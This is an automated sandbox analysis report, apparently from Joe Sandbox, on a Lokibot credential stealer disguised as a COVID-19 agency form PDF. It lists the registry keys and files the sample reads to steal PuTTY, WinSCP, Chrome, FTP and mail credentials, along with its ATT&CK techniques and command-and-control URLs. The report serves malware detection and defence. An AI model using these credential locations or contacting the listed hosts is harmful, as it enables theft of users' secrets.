                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00406069 GetUserNameW,6_2_00406069
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: PopPassword6_2_0040D069
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: SmtpPassword6_2_0040D069
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScheduled Task/Job1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection11Deobfuscate/Decode Files or Information11Input Capture1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information12Credentials in Registry2System Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSSecurity Software Discovery221Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe35%VirustotalBrowse
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe20%ReversingLabsWin32.Trojan.Wacatac
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\qvDFOnW.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\qvDFOnW.exe35%VirustotalBrowse
                C:\Users\user\AppData\Roaming\qvDFOnW.exe20%ReversingLabsWin32.Trojan.Wacatac

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://63.141.228.141/32.php/fn1ToJTMzu3Td11%VirustotalBrowse
                http://63.141.228.141/32.php/fn1ToJTMzu3Td0%Avira URL Cloudsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://www.fonts.combi0%Avira URL Cloudsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM0%Avira URL Cloudsafe
                http://www.fonts.comrsP0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.fonts.coms0%Avira URL Cloudsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://63.141.228.141/32.php/fn1ToJTMzu3Tdtrue
                • 11%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                          		high
                          http://www.ibsensoftware.com/RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.tiro.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmpfalse
                            		high
